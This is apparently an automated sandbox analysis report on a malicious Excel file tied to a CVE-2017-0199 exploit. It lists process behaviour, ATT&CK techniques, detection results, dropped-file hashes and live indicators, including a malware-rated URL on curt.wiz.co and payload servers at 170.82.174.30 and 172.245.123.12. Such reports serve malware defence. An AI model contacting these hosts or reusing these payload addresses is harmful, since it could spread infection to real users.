Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Document.xla.xlsxStream path 'MBD010681DC/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: Document.xla.xlsxStream path 'Workbook' entropy: 7.99863707372 (max. 8.0)
Source: 4F920000.0.drStream path 'MBD010681DC/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: 4F920000.0.drStream path 'Workbook' entropy: 7.97702562533 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 630Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
3
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Document.xla.xlsx21%ReversingLabsDocument-Office.Exploit.CVE-2017-0199
Document.xla.xlsx100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2100%Avira URL Cloudmalware
https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
curt.wiz.co.cdn.gocache.net
170.82.174.30
truefalse
    high
    assets.msn.com
    unknown
    unknownfalse
      high
      ecn.dev.virtualearth.net
      unknown
      unknownfalse
        high
        curt.wiz.co
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&moodfalse
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2Document.xla.xlsx, 4F920000.0.drfalse
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          170.82.174.30
          curt.wiz.co.cdn.gocache.netBrazil
          2664443LCLOUDINTERNETSERVICESLTDA-EPPBRfalse
          172.245.123.12
          unknownUnited States
          36352AS-COLOCROSSINGUSfalse
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1576236
          Start date and time:2024-12-16 17:10:23 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 38s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
          Run name:Potential for more IOCs and behavior
          Number of analysed new started processes analysed:35
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • GSI enabled (VBA)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Document.xla.xlsx
          Detection:MAL
          Classification:mal80.expl.winXLSX@8/37@4/2
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .xlsx
          • Changed system and user locale, location and keyboard layout to French - France
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Active ActiveX Object
          • Active ActiveX Object
          • Active ActiveX Object
          • Active ActiveX Object
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 52.109.28.46, 104.126.37.9, 104.126.36.248, 20.189.173.26, 20.189.173.4, 52.109.89.18, 184.30.24.41, 95.100.135.98, 95.100.135.112, 95.100.135.106, 95.100.135.107, 95.100.135.90, 95.100.135.113, 95.100.135.114, 95.100.135.96, 95.100.135.105, 52.113.194.132, 20.42.73.24, 95.100.135.40, 95.100.135.35, 95.100.135.32, 95.100.135.42, 95.100.135.26, 95.100.135.43, 95.100.135.33, 95.100.135.41, 95.100.135.25, 23.48.156.192, 2.16.158.90, 2.16.158.83, 2.16.158.74, 2.16.158.51, 2.16.158.80, 2.16.158.82, 2.16.158.75, 2.16.158.72, 2.16.158.56, 2.19.198.17, 23.32.239.58, 4.245.163.56, 40.126.53.8, 20.103.156.88
          • Excluded domains from analysis (whitelisted): e1324.dscd.akamaiedge.net, ssl2.tiles.virtualearth.net.edgekey.net, onedscolprdwus19.westus.cloudapp.azure.com, slscr.update.microsoft.com, img-s-msn-com.akamaized.net, onedscolprdeus03.eastus.cloudapp.azure.com, tse1.mm.bing.net, weu-azsc-config.officeapps.live.com, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, onedscolprdwus03.westus.cloudapp.azure.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, officeclient.microsoft.com, e28578.d.akamaiedge.net, res-1-tls.cdn.office.net, www.bing.com, e40491.dscg.akamaiedge.net, assets.msn.com.edgekey.net, ecs.office.com, prod.configsvc1.live.com.akadns.net, fd.api.iris.microsoft.com, uci.cdn.office.net, ctldl.windowsupdate.com, s-0005-office.config.skype.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, a1834.dscg2.akamai.net, res-prod.trafficmanager.net, owamail.public.cdn.office.net.edgekey.net, s-0005.s-msedge.net, config.officeapps.live.com, res.publi
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtCreateFile calls found.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadFile calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: Document.xla.xlsx
          TimeTypeDescription
          11:12:28API Interceptor732x Sleep call for process: splwow64.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          170.82.174.30yGktPvplJn.exeGet hashmaliciousPushdoBrowse
          • www.mqs.com.br/
          a5hbkmGD7N.exeGet hashmaliciousPushdoBrowse
          • www.mqs.com.br/
          9oy0DlGMH9.exeGet hashmaliciousFormBookBrowse
          • www.faunapetsstore.com/o12i/?dT=j6ATUBhxx2glQbP0&2dq=yiHtOwR0aZ7KTWOJuT9hXfachgSHyHMGkjU/6QKzyqsTP1NPRASfxqCAR1p/c7wMh9GXgUQg6w==
          file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
          • www.mqs.com.br/
          file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
          • www.mqs.com.br/
          file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
          • www.mqs.com.br/
          172.245.123.12seemebestgoodluckthings.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
          • 172.245.123.12/361/TELNERA.txt
          PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
          • 172.245.123.12/361/TELNERA.txt
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          curt.wiz.co.cdn.gocache.netSample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          3LCLOUDINTERNETSERVICESLTDA-EPPBRSample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          AS-COLOCROSSINGUSSample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 192.3.179.166
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 192.3.122.159
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 23.95.235.29
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 192.3.122.159
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 23.95.235.29
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 23.95.235.29
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 192.3.122.159
          givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
          • 192.3.122.159
          clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
          • 192.3.122.159
          No context
          No context
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):118
          Entropy (8bit):3.5700810731231707
          Encrypted:false
          SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
          MD5:573220372DA4ED487441611079B623CD
          SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
          SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
          SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
          Malicious:false
          Reputation:high, very likely benign file
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):1394
          Entropy (8bit):2.6906950763610795
          Encrypted:false
          SSDEEP:24:YHUgIgKg3Lk+3M5HyuOqYp2ICey4jEGtPOC2qcOnUXiIjazYvKp5ZSmblhkGTRFb:YHUg0f+3iUFj/tPO3O5IjDKpdTzb
          MD5:9AD60AAAD68D33D393FC0F624545A316
          SHA1:C7EBE6E994857DD3B0B62EB63860FFE77832AE4C
          SHA-256:EBF00A5B90E8621A48BCD7714E20999C5D941955109261975411869A70D84BB4
          SHA-512:D2D3257A6414FF1D4D6FBFEA75B0F2ED159F30D3B6F2DE0CD4A30AA341F274E30155E4AE06F6774162C41A654BDCC09F923E2AE5636697E5B2EE6747CDAF6666
          Malicious:false
          Preview:3.7.4.6.3.7.8.,.1.1.9.6.3.7.8.,.6.3.6.4.3.3.4.,.3.7.4.6.3.7.6.,.1.0.7.,.2.5.5.0.5.0.8.8.,.1.0.4.9.5.2.3.4.,.1.0.1.,.1.1.9.,.1.2.4.,.1.1.9.6.2.9.3.,.7.0.0.9.9.8.4.,.6.3.6.4.3.3.1.,.6.5.4.2.1.8.5.1.,.1.5.6.1.9.5.8.,.1.0.0.,.1.2.5.,.6.3.6.4.3.3.2.,.1.2.8.,.1.0.3.,.1.0.4.,.1.0.5.,.1.0.6.,.1.0.8.,.1.0.9.,.1.1.2.,.1.1.4.,.1.1.8.,.1.2.0.,.3.0.0.4.9.2.6.8.,.1.2.1.,.5.4.5.6.5.4.3.,.1.2.2.,.1.2.3.,.1.2.6.,.;.9.,.3.0.1.5.3.7.2.1.,.3.,.4.0.6.9.3.5.8.2.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.7.,.2.7.3.6.0.0.9.5.,.2.6.4.8.5.7.8.4.,.6.1.7.0.7.3.0.7.,.3.3.7.9.1.6.2.,.3.2.9.4.5.8.7.9.9.,.2.4.6.0.9.2.5.8.,.1.3.5.2.5.8.6.,.4.8.1.9.5.5.3.8.,.5.7.9.9.9.6.6.1.,.3.4.1.4.8.5.6.8.,.6.5.4.0.2.1.5.,.3.0.1.2.3.4.6.6.,.1.3.,.6.3.7.1.6.9.4.,.3.7.4.6.3.7.9.,.2.7.1.5.3.4.9.7.,.5.8.4.2.5.8.6.0.,.6.3.0.6.3.0.9.9.,.4.,.5.9.2.2.3.4.3.7.,.1.0.6.9.5.5.2.,.1.1.7.,.1.4.6.1.9.5.3.,.5.2.9.1.0.0.0.2.,.1.3.5.2.5.8.7.,.2.5.4.8.7.8.5.4.,.1.0.,.1.0.2.3.8.6.4.,.2.0.1.3.1.9.0.1.,.1.5.,.1.0.2.3.6.3.8.,.1.6.5.7.4.5.2.,.1.2.7.,.1.6.5.7.4.5.3.,.1.
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):152108
          Entropy (8bit):2.3627562871289216
          Encrypted:false
          SSDEEP:1536:cNkRory4tU9MBFjvSO6E/cq9N6hvkFrRYgn:wccn
          MD5:6A87516E938E1530AE4F7FDF4670B05A
          SHA1:4582781E2CFD03820919D67DF96362DF635C8087
          SHA-256:EE1D4A8E36A896B37F6DD108FB9414141E78190FE0253DF1063A9411B0120DB6
          SHA-512:13A43E60FE7BDD1610377C5DDA58EB981DBE5CC3222F05BC72405FCF8447E5851D5126E2E07BB386158BB4EABBF01B69B7F3E17023EB86A16022C017FB30390D
          Malicious:false
          Preview:....l...........................Z....G.. EMF....,R..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):153152
          Entropy (8bit):2.3466423098358633
          Encrypted:false
          SSDEEP:1536:QA//GN+DAtQaqrUPig97qG7bIQWkaYgJnb5:ml05
          MD5:EDFE44B84EB338E7FF394A9C1C22BED2
